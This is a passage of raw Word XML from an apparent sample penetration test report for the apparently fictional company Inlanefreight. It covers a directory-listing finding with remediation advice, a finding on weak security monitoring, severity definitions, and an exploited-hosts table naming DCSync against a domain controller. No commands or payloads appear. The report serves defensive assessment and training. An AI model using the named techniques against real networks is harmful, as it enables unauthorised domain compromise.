                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>consumption,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> then the risk is lower but if an attacker </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>can</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> gain access to sensitive information such as configuration </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>files,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> they may be able to use these to gain further access to the application or web server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="371F179B"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289DC67C" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00FE3E30" w:rsidP="00A40765">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Affected Host(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D45073" w14:textId="1C12D61F" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00DD5184" w:rsidP="005D392C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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192.168.195.21</w:t>
            </w:r>
            <w:r w:rsidR="005D392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5 (80</w:t>
            </w:r>
            <w:r w:rsidR="005D392C" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/TCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="3FA7D1C5"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3ED96841"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35816260" w14:textId="2FDA7B59" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="005D392C" w:rsidP="005D392C">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restrict access to files and directories based on the concept of least privilege. Enforce authentication wherever possible and disable directory listing in the web server configuration. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="675BB7C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242744B1"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49D3CC41" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRDefault="00F60579"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47" w:history="1">
              <w:r w:rsidR="00F75CFC" w:rsidRPr="00AC16CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1083/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1182F0C7" w14:textId="4F0D8E73" w:rsidR="007C41EB" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579"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48" w:history="1">
              <w:r w:rsidR="007C41EB" w:rsidRPr="00AC16CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="007C41EB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A70E099" w14:textId="2BAD0DD7" w:rsidR="00FE3E30" w:rsidRDefault="00FE3E30" w:rsidP="00375482">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F8B392" w14:textId="63C07610" w:rsidR="00375482" w:rsidRDefault="00375482" w:rsidP="004539C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Using a web browser, browsing to the affected host lists the directory contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0182F" w14:textId="77777777" w:rsidR="00BF25A8" w:rsidRDefault="0079201F" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33127260" wp14:editId="4B076A66">
            <wp:extent cx="3944679" cy="3798580"/>
            <wp:effectExtent l="57150" t="114300" r="113030" b="495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45428" cy="3799301"/>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67F8F6FA" w14:textId="069ED204" w:rsidR="00FE3E30" w:rsidRDefault="00BF25A8" w:rsidP="00BF25A8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB015B5" w14:textId="41969640" w:rsidR="00FE3E30" w:rsidRPr="00520B63" w:rsidRDefault="00FE3E30" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00FE3E30">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Enhance Security Monitoring Capabilities </w:t>
      </w:r>
      <w:r w:rsidRPr="006372B6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3E30">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="78BC1051"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7D3D7174"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393671E4" w14:textId="1A5222F2" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579"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50" w:history="1">
              <w:r w:rsidR="00DB264C" w:rsidRPr="00DB264C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-693</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="0EF00F1D" w14:textId="77777777" w:rsidTr="004539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788B63A9"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167B3013" w14:textId="7E118F25" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00AE15DA" w:rsidP="00A40765">
            <w:pPr>
              <w:widowControl/>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It appeared that Inlanefreight did not notice “noisy” activities during the course of testing. The tester was also not blocked when using standard </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>open-source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> penetration testing tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="6682442F" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1"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2A808695"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1FB7BAB4" w14:textId="51B2D636" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00602E00"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602E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">If network and endpoint detection and response are inadequate, an attacker who can gain a foothold in the internal network may be able to move laterally, perform post-exploitation, and achieve persistence </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="00602E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>easily</w:t>
            </w:r>
            <w:r w:rsidRPr="00602E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="35B6D6E5"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2950AF24"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175BBEE3" w14:textId="6CB17946" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00602E00" w:rsidP="00F37EF9">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00602E00">
              <w:t xml:space="preserve">Consider investing in a more advanced network monitoring solution, configuring logging on all </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="00602E00">
              <w:t>hosts,</w:t>
            </w:r>
            <w:r w:rsidRPr="00602E00">
              <w:t xml:space="preserve">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rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="4B0A8CD4"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425ECD28"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49F159B0" w14:textId="65C1C6C6" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579"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51" w:history="1">
              <w:r w:rsidR="00602E00" w:rsidRPr="00AC16CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/tactics/TA0005/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00602E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EC97D53" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRDefault="00FE3E30" w:rsidP="00FE3E30">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3592AC96" w14:textId="7FFE6ED5" w:rsidR="00655232" w:rsidRDefault="00655232">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3C229C" w14:textId="490EE679" w:rsidR="00D860BB" w:rsidRDefault="00D860BB" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Appendices"/>
      <w:bookmarkStart w:id="42" w:name="_Toc106718132"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="00042DC8">
        <w:lastRenderedPageBreak/>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="7324DDB6" w14:textId="4A76230E" w:rsidR="0036389D" w:rsidRDefault="0036389D" w:rsidP="0036389D">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc106718133"/>
      <w:r w:rsidRPr="00934A22">
        <w:t>Appendix A – Finding Severities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="04179F0E" w14:textId="312BBFBB" w:rsidR="0036389D" w:rsidRDefault="0036389D" w:rsidP="004539C5">
      <w:r w:rsidRPr="00D83A2C">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sidR="00D14781">
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidRPr="00D83A2C">
        <w:t>’s data.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1350"/>
        <w:gridCol w:w="9362"/>
      </w:tblGrid>
      <w:tr w:rsidR="0036389D" w:rsidRPr="00B96066" w14:paraId="5236399F" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EFB913F" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00934A22" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00934A22">
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9362" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44001519" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00ED3554" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:r w:rsidRPr="00ED3554">
              <w:t>Severity Rating Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0036389D" w:rsidRPr="00B96066" w14:paraId="0ECF7C67" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="918"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="054D64ED" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="0036389D" w:rsidRDefault="0036389D" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FF3E3E"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C64082">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9362" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05259B9D" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00934A22" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:r w:rsidRPr="00934A22">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rsidR="0036389D" w:rsidRPr="00B96066" w14:paraId="389F9A9A" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48E42EE5" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00C64082" w:rsidRDefault="0036389D" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="ED7D31"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C64082">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="ED7D31"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9362" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74E7D8DC" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00934A22" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:r w:rsidRPr="00934A22">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14:paraId="7D776FAC" w14:textId="05C81A3C" w:rsidR="0036389D" w:rsidRPr="004539C5" w:rsidRDefault="00ED3554" w:rsidP="004539C5">
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="0036389D" w:rsidRPr="004539C5">
              <w:t>OR</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A040E25" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00934A22" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:r w:rsidRPr="00934A22">
              <w:t>The vulnerability is such that it would otherwise be considered High Risk, but the threat exposure is so limited that the likelihood of occurrence is minimal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0036389D" w:rsidRPr="00B96066" w14:paraId="3178F54C" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DFAD4C5" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="0036389D" w:rsidRDefault="0036389D" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="92D050"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C64082">
              <w:rPr>
                <w:rStyle w:val="LowSeverityDifficult"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="006600"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9362" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AC166B3" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00934A22" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:r w:rsidRPr="00934A22">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14:paraId="688DD8C3" w14:textId="75639E8D" w:rsidR="0036389D" w:rsidRPr="004539C5" w:rsidRDefault="00ED3554" w:rsidP="004539C5">
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="0036389D" w:rsidRPr="004539C5">
              <w:t>OR</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C194DF" w14:textId="77777777" w:rsidR="0036389D" w:rsidRPr="00934A22" w:rsidRDefault="0036389D" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r w:rsidRPr="00934A22">
              <w:t>The vulnerability is such that it would otherwise be considered Medium Risk, but the threat exposure is so limited that the likelihood of occurrence is minimal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E4AE98F" w14:textId="6F8665AB" w:rsidR="00402C9B" w:rsidRPr="001C6D4A" w:rsidRDefault="004C55CB" w:rsidP="001C6D4A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Severity Definitions</w:t>
      </w:r>
      <w:r w:rsidR="00402C9B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA42E6" w14:textId="77777777" w:rsidR="00390B73" w:rsidRDefault="00390B73" w:rsidP="005E0596">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC6BB9E" w14:textId="76673522" w:rsidR="00402C9B" w:rsidRDefault="00DC2E0C" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc106718134"/>
      <w:r>
        <w:t>Appendix B</w:t>
      </w:r>
      <w:r w:rsidR="00402C9B">
        <w:t xml:space="preserve"> – Exploited Hosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5019" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2267"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="4519"/>
        <w:gridCol w:w="3012"/>
      </w:tblGrid>
      <w:tr w:rsidR="00402C9B" w14:paraId="6B67870B"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1046" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44326E37" w14:textId="691E9293" w:rsidR="00402C9B" w:rsidRPr="00D91E64" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5DBB0A39" w14:textId="77777777" w:rsidR="00402C9B" w:rsidRPr="00D91E64" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B84092B" w14:textId="395B9733" w:rsidR="00402C9B" w:rsidRPr="00704565" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="43609601" w14:textId="6455853A" w:rsidR="00402C9B" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00402C9B" w:rsidRPr="007369DF" w14:paraId="159B3C00"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7DB4934C" w14:textId="3495EAAC" w:rsidR="00402C9B" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.195.204 (DC01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1383D6CE" w14:textId="209615B9" w:rsidR="00402C9B" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="43D44A9E" w14:textId="6F4BCB87" w:rsidR="00402C9B" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DCSync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="423F6890" w14:textId="695CBE60" w:rsidR="00402C9B" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2E0C" w:rsidRPr="0005451F" w14:paraId="0CC287D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7F597DC0" w14:textId="630B9EDD" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.195.205 (MS01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="273A1FF8" w14:textId="3D95708E" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
